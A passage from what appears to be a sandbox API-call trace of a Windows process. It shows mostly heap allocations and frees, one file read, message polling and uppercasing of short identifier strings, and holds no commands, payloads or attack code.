returned 0x2a730a8 [0103.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0103.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0103.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96a0 | out: hHeap=0x2af0000) returned 1 [0103.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0103.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0103.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0103.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fa0 [0103.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0103.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0103.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0103.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0103.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0103.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9778 | out: hHeap=0x2af0000) returned 1 [0103.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0103.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0103.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0103.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0103.655] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0103.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0103.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0103.655] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0103.656] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x4ca6020 [0103.658] SetFilePointerEx (in: hFile=0x458, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0103.658] ReadFile (in: hFile=0x458, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0xb5f0, lpOverlapped=0x0) returned 1 [0103.671] ReadFile (in: hFile=0x458, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0103.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0103.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0103.671] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0103.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0103.671] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xb5f0) returned 0x2a7a130 [0103.673] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x4ca6020 | out: hHeap=0x2af0000) returned 1 [0103.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0103.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0103.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0103.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0103.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0103.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0103.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0103.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0103.676] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xb5f0) returned 0x2a85728 [0103.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0103.676] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0103.676] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0103.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0103.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0103.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0103.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0103.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xb5f0) returned 0x2a7a130 [0103.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0103.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0103.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0103.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0103.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0103.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0103.677] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0103.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0103.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f80 [0103.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0103.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0103.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0103.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0103.677] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0103.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0103.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0103.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0103.677] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0103.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0103.677] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0103.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0103.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72a58 [0103.677] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0103.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96a0 [0103.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73118 [0103.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0103.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xb5f0) returned 0x2a7a130 [0103.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73118 | out: hHeap=0x2af0000) returned 1 [0103.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a73118 [0103.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0103.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71688 [0103.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71688 | out: hHeap=0x2af0000) returned 1 [0103.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71688 [0103.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0103.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0103.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0103.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a716e8 [0103.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0103.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0103.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0103.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9820 [0103.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0103.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0103.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0103.678] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0103.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0103.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0103.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0103.678] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xb5f0) returned 0x2a90d20 [0103.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0103.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0103.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0103.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0103.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0103.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0103.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0103.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0103.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0103.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0103.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0103.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0103.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0103.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0103.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0103.679] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0103.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0103.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0103.679] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0103.680] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a717c8 [0103.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719e8 [0103.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0103.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0103.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0103.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0103.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0103.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0103.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0103.680] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0103.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0103.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0103.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0103.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0103.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0103.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719e8 | out: hHeap=0x2af0000) returned 1 [0103.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0103.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0103.680] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0103.680] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0103.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0103.680] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0103.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0103.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0103.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0103.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0103.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0103.680] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0103.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0103.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0103.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0103.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0103.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0103.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0103.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0103.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0103.681] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0103.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0103.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0103.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0103.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0103.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0103.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0103.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0103.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0103.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0103.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0103.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0103.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0103.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0103.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0103.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0103.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0103.681] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0103.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0103.681] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0103.681] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0103.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0103.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0103.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0103.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0103.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0103.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0103.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0103.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0103.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0103.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0103.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0103.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0103.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0103.682] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0103.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0103.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0103.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0103.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0103.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0103.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0103.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0103.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0103.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0103.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0103.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0103.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0103.682] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0103.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0103.682] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0103.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0103.683] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0103.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0103.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0103.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0103.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0103.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0103.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a38 [0103.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0103.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0103.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0103.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0103.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0103.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0103.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0103.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0103.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a717c8 | out: hHeap=0x2af0000) returned 1 [0103.683] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0103.683] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0103.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0103.683] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0103.683] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: 